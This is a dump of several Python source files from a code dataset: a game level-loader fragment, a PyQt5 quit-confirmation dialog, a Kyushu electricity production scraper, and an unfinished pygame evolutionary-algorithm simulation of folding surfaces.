level['string'][HORIZONTAL_LEFT_INDEX] == NOTHING:\n doors['left'] = True\n if level['string'][HORIZONTAL_RIGHT_INDEX] == NOTHING:\n doors['right'] = True\n if level['string'][HORIZONTAL_TOPLEFT_INDEX] == NOTHING:\n doors['topleft'] = True\n if level['string'][HORIZONTAL_TOPRIGHT_INDEX] == NOTHING:\n doors['topright'] = True\n if level['string'][HORIZONTAL_BOTTOMLEFT_INDEX] == NOTHING:\n doors['bottomleft'] = True\n if level['string'][HORIZONTAL_BOTTOMRIGHT_INDEX] == NOTHING:\n doors['bottomright'] = True\n elif level['shape'] == BIG_SQUARE_SHAPE:\n doors = {'topleft_top': False, 'topleft_left': False, 'bottomleft_bottom': False, 'bottomleft_left': False,\n 'topright_top': False,\n 'topright_right': False, 'bottomright_bottom': False, 'bottomright_right': False}\n if level['string'][BIG_TOPLEFT_TOP_INDEX] == NOTHING:\n doors['topleft_top'] = True\n if level['string'][BIG_TOPLEFT_LEFT_INDEX] == NOTHING:\n doors['topleft_left'] = True\n if level['string'][BIG_TOPRIGHT_TOP_INDEX] == NOTHING:\n doors['topright_top'] = True\n if level['string'][BIG_TOPRIGHT_RIGHT_INDEX] == NOTHING:\n doors['topright_right'] = True\n if level['string'][BIG_BOTTOMLEFT_BOTTOM_INDEX] == NOTHING:\n doors['bottomleft_bottom'] = True\n if level['string'][BIG_BOTTOMLEFT_LEFT_INDEX] == NOTHING:\n doors['bottomleft_left'] = True\n if level['string'][BIG_BOTTOMRIGHT_BOTTOM_INDEX] == NOTHING:\n doors['bottomright_bottom'] = True\n if level['string'][BIG_BOTTOMRIGHT_RIGHT_INDEX] == NOTHING:\n doors['bottomright_right'] = True\n return doors\n\n\ndef load_level(game):\n name = input(\"Input the level name :\\n\")\n try:\n with open(LEVEL_PATH + name + '.pickle', 'rb') as file:\n level = pickle.load(file)\n print(\"Loaded \" + name + \" level.\\n\")\n return game.active_scene.convert_to_level(level)\n except:\n print(\"No such file found.\\n\")\n","repo_name":"MonkeyWaffle0/theDescent","sub_path":"level_creator/data/scripts/core_funcs.py","file_name":"core_funcs.py","file_ext":"py","file_size_in_byte":8921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42121860268","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QMessageBox\n\nclass Exp(QWidget):\n\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.setGeometry(300, 300, 300, 200)\n self.setWindowTitle('Quit')\n self.show()\n\n def closeEvent(self, event):\n \"\"\"重新定义closeEvent\"\"\"\n reply = QMessageBox.question(self, 'Message', 'You sure to quit?',\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if reply == QMessageBox.Yes:\n event.accept()\n else:\n event.ignore()\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Exp()\n sys.exit(app.exec_())\n\n","repo_name":"YuanXianguo/Python-Project-ITC","sub_path":"GUI学习/00PyQt5学习笔记/05弹出对话框请求确认.py","file_name":"05弹出对话框请求确认.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9870282897","text":"#!/usr/bin/env python3\nimport re\nfrom datetime import datetime\nfrom logging import Logger, getLogger\n\n# The arrow library is used to handle datetimes\nimport arrow\n\n# The request library is used to fetch content through HTTP\nfrom bs4 import BeautifulSoup\nfrom requests import Session, get\n\nfrom parsers import occtonet\n\n\ndef fetch_production(\n zone_key: str = \"JP-KY\",\n session: Session | None = None,\n target_datetime: datetime | None = None,\n logger: Logger = getLogger(__name__),\n) -> dict | list:\n \"\"\"Requests the last known production mix (in MW) of a given zone.\"\"\"\n if target_datetime:\n raise NotImplementedError(\"This parser is not yet able to parse past dates\")\n data = {\n \"zoneKey\": zone_key,\n \"datetime\": None,\n \"production\": {\n \"biomass\": 0,\n \"coal\": 0,\n \"gas\": 0,\n \"hydro\": None,\n \"nuclear\": None,\n \"oil\": 0,\n \"solar\": None,\n \"wind\": None,\n \"geothermal\": None,\n \"unknown\": 0,\n },\n \"storage\": {},\n \"source\": \"www.kyuden.co.jp\",\n }\n # url for consumption and solar\n url = \"https://www.kyuden.co.jp/td_power_usages/pc.html\"\n r = get(url)\n r.encoding = \"utf-8\"\n html = r.text\n soup = BeautifulSoup(html, \"lxml\")\n # get hours, minutes\n ts = soup.find(\"p\", class_=\"puProgressNow__time\").get_text()\n hours = int(re.findall(r\"[\\d]+(?=時)\", ts)[0])\n minutes = int(re.findall(r\"(?<=時)[\\d]+(?=分)\", ts)[0])\n # get date\n ds = soup.find(\"div\", class_=\"puChangeGraph\")\n date = re.findall(r\"(?<=chart/chart)[\\d]+(?=.gif)\", str(ds))[0]\n # parse datetime\n dt = f\"{date[:4]}-{date[4:6]}-{date[6:]} {hours:02d}:{minutes:02d}\"\n dt = arrow.get(dt).replace(tzinfo=\"Asia/Tokyo\").datetime\n data[\"datetime\"] = dt\n # consumption\n cons = soup.find(\"p\", class_=\"puProgressNow__useAmount\").get_text()\n cons = re.findall(\n r\"(?<=使用量\\xa0)[-+]?[.]?[\\d]+(?:,\\d\\d\\d)*[\\.]?\\d*(?:[eE][-+]?\\d+)?(?=万kW/)\",\n cons,\n )\n cons = cons[0].replace(\",\", \"\")\n # convert from 万kW to MW\n cons = float(cons) * 10\n # solar\n solar = soup.find(\"td\", class_=\"puProgressSun__num\").get_text()\n # convert from 万kW to MW\n solar = float(solar) * 10\n\n # add nuclear power plants\n # Sendai and Genkai\n url_s = \"\".join(\n [\n \"http://www.kyuden.co.jp/php/nuclear/sendai/rename.php?\",\n \"A=s_power.fdat&B=ncp_state.fdat&_=1520532401043\",\n ]\n )\n url_g = \"\".join(\n [\n \"http://www.kyuden.co.jp/php/nuclear/genkai/rename.php?\",\n \"A=g_power.fdat&B=ncp_state.fdat&_=1520532904073\",\n ]\n )\n sendai = get(url_s).text\n sendai = re.findall(\n r\"(?<=gouki=)[-+]?[.]?[\\d]+(?:,\\d\\d\\d)*[\\.]?\\d*\" + r\"(?:[eE][-+]?\\d+)?(?=&)\",\n sendai,\n )\n genkai = get(url_g).text\n genkai = re.findall(\n r\"(?<=gouki=)[-+]?[.]?[\\d]+(?:,\\d\\d\\d)*[\\.]?\\d*\" + r\"(?:[eE][-+]?\\d+)?(?=&)\",\n genkai,\n )\n nuclear = 0\n for sendai_i in sendai:\n nuclear += float(sendai_i)\n for genkai_i in genkai:\n nuclear += float(genkai_i)\n # convert from 万kW to MW\n nuclear = nuclear * 10\n\n # add the exchange JP-CG->JP-KY\n exch_list = occtonet.fetch_exchange(\"JP-KY\", \"JP-CG\")\n # find the nearest exchanges in time to consumption timestamp\n nearest_exchanges = sorted(exch_list, key=lambda exch: abs(exch[\"datetime\"] - dt))\n # take the nearest exchange\n exch = nearest_exchanges[0]\n # check that consumption and exchange timestamps are within a 15 minute window\n if abs(dt - exch[\"datetime\"]).seconds <= 900:\n generation = cons - exch[\"netFlow\"]\n data[\"production\"][\"solar\"] = solar\n data[\"production\"][\"nuclear\"] = nuclear\n data[\"production\"][\"unknown\"] = generation - nuclear - solar\n\n return data\n else:\n return []\n\n\nif __name__ == \"__main__\":\n \"\"\"Main method, never used by the Electricity Map backend, but handy for testing.\"\"\"\n\n print(\"fetch_production() ->\")\n print(fetch_production())\n","repo_name":"electricitymaps/electricitymaps-contrib","sub_path":"parsers/JP-KY.py","file_name":"JP-KY.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":3126,"dataset":"github-code","pt":"21"} +{"seq_id":"28424816052","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 28 19:30:05 2022\r\n\r\n@author: gabri\r\n\"\"\"\r\nfrom datetime import datetime\r\nimport pygame\r\nimport sys\r\nfrom pygame.locals import * #import all modules\r\nimport random\r\nimport math\r\nimport csv\r\nfrom matplotlib.animation import FuncAnimation\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np\r\n#Settings\r\nclock = pygame.time.Clock()\r\npygame.init() #initiates pygame\r\npygame.display.set_caption(\"Evolutionärer Algorithmus V1\") #giving a name to the window\r\nlaenge = 1900\r\nbreite = 700\r\nWINDOW_SIZE = (laenge,breite) #create window\r\nscreen = pygame.display.set_mode(WINDOW_SIZE,0,32) #initiate the window\r\n\r\nzyklen = 2\r\npopulationsnum = 1\r\nfaltflaechen = 8\r\ngelenke = faltflaechen-1\r\ngelenke_hidden = faltflaechen+1\r\npopulation = []\r\npopulation2 = []\r\nstartpunkt = (500,300)\r\n\r\nobstacles = []\r\norigin = (0,0)\r\nrays = []\r\ncollision_nr = 0\r\n\r\ng = 9.81\r\nsp_list = []\r\nsp_point = (0,0)\r\ng_vectors = []\r\ny_offset = 0\r\ny_boden = 500\r\n\r\ndraw_points = []\r\nturning_angles = 0\r\n\r\nfriction_x = 0\r\nx_offset = 0 #wegen Reibung\r\nsum_laenge = 0\r\nhygroskopizität = []\r\n\r\nmutation_list = []\r\n\r\n\r\n#population nr\r\npop_nr = 0\r\npopulation_limit = 100 #Wie gross die Anfangspopulation?\r\nselection_ratio = 0.10 #Dezimal\r\n\r\n#Chart informations\r\nfps_=80\r\nplt.ion()\r\ndef plot_animation(status):\r\n try:\r\n df = pd.read_csv('Fitness.csv', index_col=0)\r\n y = df.index[1:len(df.index)]\r\n plt.plot(y,'.')\r\n plt.axis([0, len(df.index), -0.1, 3])\r\n plt.xlabel('Nr. Individuum')\r\n plt.ylabel('Relative Geschwindigkeit')\r\n plt.draw()\r\n if status == 1:\r\n print(\"saved\")\r\n plt.savefig('Fitness_Results.png')\r\n plt.pause(0.0001)\r\n # if i == len(df.index)-1:\r\n # print(\"saved\")\r\n # plt.savefig('foo.png')\r\n plt.clf()\r\n except:\r\n pass\r\n \r\n\r\n#Calculating number of generations\r\nanzahl = population_limit\r\ngenerations = 0\r\nwhile anzahl >= 1:\r\n generations += 1\r\n anzahl = round(anzahl*(selection_ratio)**generations)\r\n if anzahl/2 != round(anzahl/2):\r\n anzahl += 1\r\n \r\ngenerations = generations + 1 #Maximale Anzahl an Generationen bis das schnellste Objekt gefunden wurde\r\ngenerations = 60\r\nnr_in_generation = population_limit\r\n\r\n\r\n\r\n\r\ndef print_csv(list_population_nr, nummer):\r\n data = list_population_nr\r\n if nummer == 0:\r\n mode = 'a'\r\n if pop_nr == 0:\r\n mode = 'w'\r\n for i in range(len(data)):\r\n mode = 'a'\r\n if pop_nr == 0:\r\n if i == 0:\r\n mode = 'w'\r\n print(\"To csv\", data[i], mode)\r\n with open('RESULTS.csv', mode) as file:\r\n writer = csv.writer(file)\r\n writer.writerow(data[i])\r\n if i == 2:\r\n if data[i][0] >= 0:\r\n if data[i][0] < 3:\r\n with open('FITNESS.csv', mode) as file:\r\n writer = csv.writer(file)\r\n writer.writerow(data[i])\r\n else:\r\n for i in range(len(data)):\r\n for k in range(len(data[i])):\r\n if i == 0 and k == 0:\r\n mode = 'w'\r\n else:\r\n mode = 'a'\r\n with open('RESULTS.csv', mode) as file:\r\n print(data[i], mode)\r\n writer = csv.writer(file)\r\n writer.writerow(data[i][k])\r\n\r\ndef mutation_surface():\r\n random.seed(datetime.now())\r\n return(random.randint(-10,10))\r\ndef mutation_angle():\r\n random.seed(datetime.now())\r\n return(random.randint(-5,5))\r\n\r\n \r\n#########################################\r\ndef sel_reco_mut(): \r\n global population2, nr_in_generation, mutation_list\r\n in_file = open(\"RESULTS.csv\", \"r\")\r\n reader = csv.reader(in_file)\r\n mylist = list(reader)\r\n in_file.close()\r\n print(mylist)\r\n data_ex = []\r\n #print all data from csv as list\r\n for i in range(len(mylist)):\r\n if len(mylist[i]) == 0:\r\n pass\r\n elif mylist[i][0] == '':\r\n pass\r\n else:\r\n data_ex.append(mylist[i])\r\n \r\n \r\n \r\n #Selektion anhand von Fitness: beste 25% -> höher bis eine gerade Anzahl gefunden worden ist => Paarung\r\n population3 = []\r\n gene = 3\r\n for i in range(population_limit):\r\n population3.append(data_ex[i*gene:(i+1)*gene])\r\n \r\n for i in range(len(population3)):\r\n for j in range(len(population3[i])):\r\n for k in range(len(population3[i][j])):\r\n try:\r\n population3[i][j][k] = int(population3[i][j][k]) \r\n except:\r\n population3[i][j][k] = float(population3[i][j][k]) \r\n \r\n print(population3)\r\n population3 = sorted(population3, key=lambda tup: tup[2], reverse=True)\r\n \r\n print(\"sortiert: \", population3)\r\n #Achtung dass +1 weglassen\r\n \r\n selection_nr = int((len(population3))*selection_ratio)\r\n if selection_nr/2 != round(selection_nr/2):\r\n selection_nr += 1\r\n \r\n new_population = []\r\n #Algorithmus ist beendet\r\n if selection_nr == 1:\r\n print(\"finished\")\r\n plot_animation(1)\r\n pygame.quit()\r\n sys.exit()\r\n else:\r\n for i in range(selection_nr):\r\n new_population.append(population3[i])\r\n nr_in_generation = selection_nr\r\n print(\"\")\r\n print(\"Selection\", new_population)\r\n \r\n #new_population = random.sample(new_population, len(new_population)) #Liste beliebig mischen\r\n \r\n #Rekombination -> Hälfte der Genen werden ausgetauscht (für Fläche und Gelenke)\r\n nachwuchs = []\r\n \r\n # for i in range(int(len(new_population)/2)):\r\n # i_new = i*2 #für jedes 2er-Paar\r\n # #Gelenke\r\n # half1 = int(len(new_population[0][0])/2)\r\n # half2 = len(new_population[0][0])-int(len(new_population[0][0])/2)\r\n # # print(half1, half2)\r\n # part1 = new_population[i_new][0][0:half1]\r\n # part2 = new_population[i_new][0][half1:half1+half2]\r\n # part3 = new_population[i_new+1][0][0:half1]\r\n # part4 = new_population[i_new+1][0][half1:half1+half2]\r\n # # print(\"\")\r\n # # print(part1, part2, part3, part4)\r\n # new_population[i_new][0] = part1+part4\r\n # new_population[i_new+1][0] = part3+part2\r\n \r\n \r\n \r\n # #Flächen-Längen\r\n # half1 = int(len(new_population[0][1])/2)\r\n # half2 = len(new_population[0][1])-int(len(new_population[0][1])/2)\r\n # # print(\"Flächen:\",half1, half2)\r\n # part1 = new_population[i_new][1][0:half1]\r\n # part2 = new_population[i_new][1][half1:half1+half2]\r\n # part3 = new_population[i_new+1][1][0:half1]\r\n # part4 = new_population[i_new+1][1][half1:half1+half2]\r\n # # print(\"\")\r\n # # print(part1, part2, part3, part4)\r\n # new_population[i_new][1] = part1+part4\r\n # new_population[i_new+1][1] = part3+part2\r\n \r\n for u in range(len(new_population)): #Überbevölkerung + MUTATION\r\n kinder = 0\r\n if new_population[u][2][0] > 0.0:\r\n kinder = 1 #1 Eltern -> 1 Kinder\r\n if new_population[u][2][0] > 0.5:\r\n kinder = 8 #1 Eltern -> 1 Kinder \r\n if new_population[u][2][0] > 1.0:\r\n kinder = 10 #1 Eltern -> 2 Kinder\r\n if new_population[u][2][0] > 1.5:\r\n kinder = 12 #2 Eltern -> 5 Kinder\r\n if new_population[u][2][0] > 3:\r\n kinder = 0 #ERROR\r\n if new_population[u][2][0] <= 0.0:\r\n kinder = 0 #Rückwärts \r\n for n_kind in range(kinder): #2 Eltern werden zu 4 Kindern\r\n surfaces = []\r\n angles = []\r\n for k in range(len(new_population[u][0])):\r\n a = random.randint(-18,18)\r\n if new_population[u][0][k] + a <= 7:\r\n surfaces.append(new_population[u][0][k])\r\n else:\r\n surfaces.append(new_population[u][0][k] + a)\r\n for z in range(len(new_population[u][1])):\r\n a = random.randint(-10,10)\r\n if new_population[u][1][z] + a <= -90 or new_population[u][1][z] + a >= 90:\r\n angles.append(new_population[u][1][z])\r\n else:\r\n angles.append(new_population[u][1][z] + a)\r\n new_population[u] = [surfaces,angles,new_population[u][2]]\r\n nachwuchs.append(new_population[u])\r\n \r\n \r\n # print(\"\")\r\n # print(\"Recombination\",new_population)\r\n new_population = []\r\n new_population = nachwuchs #die Filialgeneration übernimmt, die Parentalgeneration stirbt\r\n new_population = random.sample(new_population, len(new_population)) #Liste beliebig mischen \r\n mutation_list = []\r\n print(\"#################\")\r\n print(new_population)\r\n print(\"\")\r\n # Mutation: Flächen: +/- 5 , Hygroskopizität: +/- 10\r\n \r\n new_2_population = []\r\n #Error bei Fitness-Berechnung?\r\n for i in range(len(new_population)):\r\n if new_population[i][2][0] > 3.0:\r\n \r\n pass\r\n elif new_population[i][2][0] < 0.0:\r\n \r\n pass\r\n else:\r\n new_2_population.append(new_population[i])\r\n nr_in_generation = len(new_2_population)\r\n #data = [[new_population[i][2][0]]]\r\n # with open('FITNESS.csv', 'a') as file:\r\n # writer = csv.writer(file)\r\n # writer.writerows(data)\r\n print_csv(new_2_population,1)\r\n print(\"Print to csv:\", new_2_population)\r\n population2 = new_2_population\r\n \r\n \r\n#########################################\r\ndef humidity_level(frame):\r\n i = (frame-5) * 0.05\r\n return(round((math.sin(0.5*i-14)+1)*50,1))#\r\n\r\ndef startpopulation(populationsnum, o):\r\n global population, sum_laenge, hygroskopizität, population2\r\n if generation_nr == 1:\r\n for i in range(0,populationsnum):\r\n gelenke_pos=[]\r\n laengen=[]\r\n gelenke_hygr=[]\r\n gelenke_status = []\r\n for l in range(0,faltflaechen):\r\n laenge = random.randint(7,100)\r\n laengen.append(laenge)\r\n sum_laenge += laenge\r\n for k in range(0,gelenke_hidden):\r\n num = random.randint(-90,90)\r\n gelenke_hygr.append(num)\r\n hygroskopizität.append(num)\r\n gelenke_status.append((1,0))\r\n genotyp = (0, laengen, gelenke_hygr, gelenke_pos, gelenke_status, 0)\r\n population.append(genotyp)\r\n else:\r\n \r\n gelenke_pos=[]\r\n laengen=population2[o][0]\r\n gelenke_hygr=population2[o][1]\r\n gelenke_status = []\r\n for l in range(len(population2[o][0])):\r\n sum_laenge += population2[o][0][l]\r\n for k in range(len(population2[o][1])):\r\n hygroskopizität.append(population2[o][1][k])\r\n gelenke_status.append((1,0))\r\n genotyp = (0, laengen, gelenke_hygr, gelenke_pos, gelenke_status, 0)\r\n population.append(genotyp)\r\n print(\"Von population2 übernommen:\", population)\r\n\r\n\r\ndef collision(population_nr, origin, endpoint, flaeche_nr, frame):\r\n global collision_nr\r\n global population\r\n obstacles = population[population_nr][3]\r\n obstacle_nr = len(obstacles)-1 #1. weil die Anzahl der Paare 1 kleiner als die Anzahl Flächen ist + (2.) weil die geraden eben gemachte Fläche nicht zählt\r\n \r\n #for all starts and ends of all objects n\r\n for n in range(0,obstacle_nr):\r\n start = obstacles[n]\r\n end = obstacles[n+1]\r\n pygame.draw.line(screen, (255, 0, 0), start, end) #obstacle\r\n pos = intersect_line_line(start, end, origin, endpoint)\r\n if pos:\r\n counter = 0\r\n #benachbarte Flächen ==> dann war es doch keine Berührung\r\n if abs(n-flaeche_nr) == 1:\r\n pass\r\n else:\r\n #wirkliche Berührung\r\n #collision_nr = collision_nr + 1\r\n #print(\"collision between:\",n,flaeche_nr)\r\n pygame.draw.circle(screen, (0, 255, 0), (round(pos[0]), round(pos[1])), 3)\r\n #Gelenke zwischen den Flächen ausschalten\r\n if n < flaeche_nr:\r\n for t in range(n, flaeche_nr):\r\n #Winkel schon blockiert? Dann lassen.\r\n if population[population_nr][5][t][0] == 0:\r\n pass\r\n else:\r\n population[population_nr][5][t] = (0, frame)\r\n else:\r\n for t in range(flaeche_nr, n):\r\n if population[population_nr][5][t][0] == 0:\r\n pass\r\n else:\r\n population[population_nr][5][t] = (0, frame)\r\n #print(population[population_nr][5])\r\n\r\n\r\n\r\ndef intersect_line_line(P0, P1, Q0, Q1): #P ist obstacle, Q ist ray (bewegliche Linie)\r\n d = (P1[0]-P0[0]) * (Q1[1]-Q0[1]) + (P1[1]-P0[1]) * (Q0[0]-Q1[0]) \r\n #delta x von P * delta y von Q +delta y von P * delta x von Q\r\n if d == 0:\r\n return None\r\n t = ((Q0[0]-P0[0]) * (Q1[1]-Q0[1]) + (Q0[1]-P0[1]) * (Q0[0]-Q1[0])) / d\r\n #delta zwischen x von P/Q * delta y von Q + delta zwischen y von P/Q * delta x von Q\r\n u = ((Q0[0]-P0[0]) * (P1[1]-P0[1]) + (Q0[1]-P0[1]) * (P0[0]-P1[0])) / d\r\n #delta zwischen x von P/Q * delta y von P + delta zwischen y von P/Q * delta x von P\r\n if 0 <= t <= 1 and 0 <= u <= 1:\r\n return P1[0] * t + P0[0] * (1-t), P1[1] * t + P0[1] * (1-t)\r\n return None\r\n\r\ndef sp_calc(p1, p2, k, population_nr, frame):\r\n y_coord = p1[1] + (p2[1]-p1[1])/2\r\n x_coord = p1[0] + (p2[0]-p1[0])/2 \r\n #drawing SP\r\n pygame.draw.circle(screen, (255, 0, 0), (x_coord, y_coord), 3)\r\n \r\n #calculating \"mass\"\r\n \r\n m = math.sqrt((p2[0]-p1[0])**2 + (p2[1]-p1[1])**2)*3\r\n l = math.sqrt((p2[0]-p1[0])**2 + (p2[1]-p1[1])**2)\r\n if len(sp_list) == faltflaechen:\r\n sp_list[k] = (x_coord, y_coord,l)\r\n else:\r\n sp_list.append((x_coord, y_coord,l))\r\n sp()\r\n gravity_vec(x_coord, y_coord, m,k, population_nr, frame)\r\n \r\ndef sp():\r\n global sp_point\r\n x = 0\r\n y = 0\r\n l = 0\r\n for i in range(len(sp_list)):\r\n x += sp_list[i][0]*sp_list[i][2]\r\n y += sp_list[i][1]*sp_list[i][2]\r\n l += sp_list[i][2]\r\n try:\r\n pygame.draw.circle(screen, (0, 0, 255), (x/l,y/l), 5)\r\n sp_point = (x/l,y/l)\r\n except:\r\n print(\"Error: DIVISION BY 0\")\r\n \r\n \r\ndef gravity_vec(x,y, m,k, population_nr, frame):\r\n force_magnifier = 0.02\r\n force = g * force_magnifier * m\r\n #Einzelne Vektoren zeichnen\r\n #g_vector = pygame.draw.line(screen, (255,0,0), (x,y),(x,y+force),1)\r\n if len(g_vectors) == faltflaechen:\r\n g_vectors[k] = (x,y,force)\r\n gravity_sum_vec(population_nr, frame)\r\n else:\r\n g_vectors.append((x,y,force))\r\n\r\ndef gravity_sum_vec(population_nr, frame):\r\n x_sum = 0\r\n y_sum = 0\r\n forces_sum = 0\r\n for i in range(len(g_vectors)):\r\n x_sum += g_vectors[i][0]\r\n y_sum += g_vectors[i][1]\r\n forces_sum += g_vectors[i][2]\r\n x_sum_avg = x_sum/len(g_vectors) #durchschnittliche x-Koordinate der Vektoren (Angriffspunkte)\r\n y_sum_avg = y_sum/len(g_vectors)\r\n forces_sum_avg = forces_sum\r\n #g_sum_vector = pygame.draw.line(screen, (255,0,0), (x_sum_avg,y_sum_avg),(x_sum_avg,y_sum_avg+forces_sum_avg),1)\r\n #pygame.draw.circle(screen, (0, 0, 255), (x_sum_avg,y_sum_avg), 3)\r\n \r\n\r\ndef gravity(population_nr, frame):\r\n global y_offset, population, startpunkt, turning_angles, friction_x, x_offset\r\n \r\n \r\n m, p1, p2, z1, z2 = gravity_line(population_nr)\r\n pygame.draw.circle(screen, (0, 0, 255), p2, 3)\r\n pygame.draw.circle(screen, (0, 0, 255), p1, 3)\r\n \r\n\r\n objekt_nr = population_nr\r\n #ganzes Objekt am \"geerdeten\" Punkt um einen Winkel drehen\r\n alpha = math.degrees(math.atan(m))\r\n alpha = math.radians(alpha)\r\n turning_angles = alpha\r\n ################################################\r\n \r\n #print(\"vorher:\", frame, population[population_nr][3])\r\n if m > 0: #EIGENTLICH: m<0 !!!\r\n #print(\"m = POSITIV\")\r\n if type(friction_x) == int:\r\n friction_x = (p1[0], z1)\r\n elif friction_x[1] == z1:\r\n x_offset = friction_x[0]-p1[0]\r\n else:\r\n friction_x = (p1[0], z1)\r\n \r\n draw_points[z1]=p1\r\n \r\n #REAL Y_OFFSET\r\n y_min = p1[1]\r\n if y_min < y_boden:\r\n y_offset = abs(y_boden-y_min)\r\n else:\r\n y_offset = -1*abs(y_boden-y_min)\r\n \r\n #Objekt auf den boden verschieben\r\n startpunkt = (startpunkt[0], startpunkt[1]+y_offset)\r\n for u in range(len(population[population_nr][3])):\r\n population[population_nr][3][u] = (population[population_nr][3][u][0],population[population_nr][3][u][1]+y_offset)\r\n \r\n \r\n for t in range(len(population[objekt_nr][3])):\r\n #distanz zwischen P1 und dem anderen Punkt Pn\r\n r = math.sqrt((population[objekt_nr][3][t][0]-p1[0])**2+(population[objekt_nr][3][t][1]-p1[1])**2)\r\n if r == 0:\r\n pass\r\n else:\r\n #Drehung um alpha\r\n \r\n #x = 1*population[objekt_nr][3][t][0]*math.cos(alpha) - population[objekt_nr][3][t][1]*math.sin(alpha)\r\n #y = 1*population[objekt_nr][3][t][0]*math.sin(alpha) + population[objekt_nr][3][t][1]*math.cos(alpha)\r\n x_2 = population[population_nr][3][t][0]\r\n y_2 = population[population_nr][3][t][1]\r\n x_1 = p1[0]\r\n y_1 = p1[1]\r\n \r\n if x_1 == x_2:\r\n #Punkt ist das Drehzentrum, Koordinaten bleiben somit gleich\r\n \r\n pass\r\n else:\r\n m3 = (y_1-y_2)/(x_2-x_1)\r\n if population[population_nr][3][t][0] > p1[0]:\r\n beta = math.degrees(math.atan(m3))\r\n beta = math.radians(beta)\r\n x = p1[0]+r*math.cos(beta-alpha)\r\n y = p1[1]-r*math.sin(beta-alpha)\r\n \r\n #turn(x,y,t, population_nr, frame)\r\n else: \r\n beta = math.degrees(math.atan(m3))\r\n beta = math.radians(beta)\r\n x = p1[0]+r*math.cos(beta-alpha+math.radians(180))\r\n y = p1[1]-r*math.sin(beta-alpha+math.radians(180))\r\n \r\n #turn(x,y,t, population_nr, frame)\r\n # c = 300\r\n # pygame.draw.line(screen, (255, 0, 255), (p1[0],p1[1]), (p1[0]+c,p1[1]-m*c), 6)\r\n if t == 0:\r\n pygame.draw.circle(screen, (255,0,0), (x,y), 3)\r\n else:\r\n pygame.draw.circle(screen, (255,0,255), (x,y), 3)\r\n if t > z1:\r\n draw_points[t] = (x,y)\r\n \r\n elif t == z1:\r\n pass\r\n else:\r\n draw_points[t] = (x,y) \r\n \r\n \r\n else:\r\n #print(\"m = NEGATIV\")\r\n if type(friction_x) == int:\r\n friction_x = (p2[0], z2)\r\n elif friction_x[1] == z2:\r\n x_offset = friction_x[0]-p2[0]\r\n else:\r\n friction_x = (p2[0], z2)\r\n draw_points[z2]=p2\r\n \r\n #REAL Y_OFFSET\r\n y_min = p2[1]\r\n if y_min < y_boden:\r\n y_offset = abs(y_boden-y_min)\r\n else:\r\n y_offset = -1*abs(y_boden-y_min)\r\n \r\n #Objekt auf den boden verschieben\r\n startpunkt = (startpunkt[0], startpunkt[1]+y_offset)\r\n for u in range(len(population[population_nr][3])):\r\n population[population_nr][3][u] = (population[population_nr][3][u][0],population[population_nr][3][u][1]+y_offset)\r\n \r\n for t in range(len(population[objekt_nr][3])):\r\n \r\n #distanz zwischen P1 und dem anderen Punkt Pn\r\n r = math.sqrt((population[objekt_nr][3][t][0]-p2[0])**2+(population[objekt_nr][3][t][1]-p2[1])**2)\r\n if r == 0:\r\n pass\r\n else:\r\n #Drehung um alpha\r\n x_2 = population[population_nr][3][t][0]\r\n y_2 = population[population_nr][3][t][1]\r\n x_1 = p2[0]\r\n y_1 = p2[1]\r\n if x_1 == x_2:\r\n #Punkt ist das Drehzentrum, Koordinaten bleiben somit gleich\r\n \r\n pass\r\n else:\r\n m3 = (y_1-y_2)/(x_2-x_1)\r\n if population[population_nr][3][t][0] > p2[0]:\r\n beta = math.degrees(math.atan(m3))\r\n beta = math.radians(beta)\r\n x = p2[0]+r*math.cos(beta-alpha)\r\n y = p2[1]-r*math.sin(beta-alpha)\r\n #turn(x,y,t, population_nr, frame) \r\n else: \r\n \r\n beta = math.degrees(math.atan(m3))\r\n beta = math.radians(beta)\r\n x = p2[0]+r*math.cos(beta-alpha+math.radians(180))\r\n y = p2[1]-r*math.sin(beta-alpha+math.radians(180))\r\n #turn(x,y,t, population_nr, frame)\r\n # c = 300\r\n # pygame.draw.line(screen, (255, 0, 255), (p1[0],p1[1]), (p1[0]+c,p1[1]-m*c), 6)\r\n if t == 0:\r\n pygame.draw.circle(screen, (255,0,0), (x,y), 3)\r\n else:\r\n pygame.draw.circle(screen, (255,0,255), (x,y), 3)\r\n if t > z2:\r\n draw_points[t] = (x,y) \r\n \r\n elif t == z2:\r\n pass\r\n else:\r\n draw_points[t] = (x,y) \r\n \r\n #print(x,y, r, beta) \r\n #print(\"nachher:\", frame, population[population_nr][3])\r\n #print(frame, draw_points)\r\n \r\n \r\n #population[population_nr] = (population[population_nr][0],population[population_nr][1],population[population_nr][2],draw_points, population[population_nr][4], population[population_nr][5],population[population_nr][6])\r\n \r\n\r\n \r\ndef turn(x,y,n, population_nr, frame):\r\n global population, startpunkt, draw_points \r\n if frame > 10:\r\n if n == 0:\r\n population[population_nr][3][n] = (x,y)\r\n if n == 1:\r\n population[population_nr][3][n] = (x,y)\r\n draw_points.append((x,y)) \r\n pass\r\n\r\n ########################################################\r\n\r\ndef gravity_line(population_nr):\r\n global population, sp_point\r\n Gelenke_Koordinaten_Liste = population[population_nr][3]\r\n rechts_von_S = []\r\n links_von_S = []\r\n a,b = (0,0), (0,0)\r\n for i in range(len(Gelenke_Koordinaten_Liste)):\r\n if Gelenke_Koordinaten_Liste[i][0] > sp_point[0]:\r\n rechts_von_S.append(Gelenke_Koordinaten_Liste[i])\r\n else:\r\n links_von_S.append(Gelenke_Koordinaten_Liste[i])\r\n switch = 1\r\n while switch == 1:\r\n #Funktion\r\n m2 = 0\r\n for p1 in range(len(links_von_S)):\r\n for p2 in range(len(rechts_von_S)):\r\n #m und q bestimmen:\r\n x1 = links_von_S[p1][0]\r\n y1 = links_von_S[p1][1]\r\n x2 = rechts_von_S[p2][0]\r\n y2 = rechts_von_S[p2][1]\r\n \r\n m = (y2-y1)/(x2-x1)\r\n m2 = (y1-y2)/(x2-x1)\r\n q = y1 - 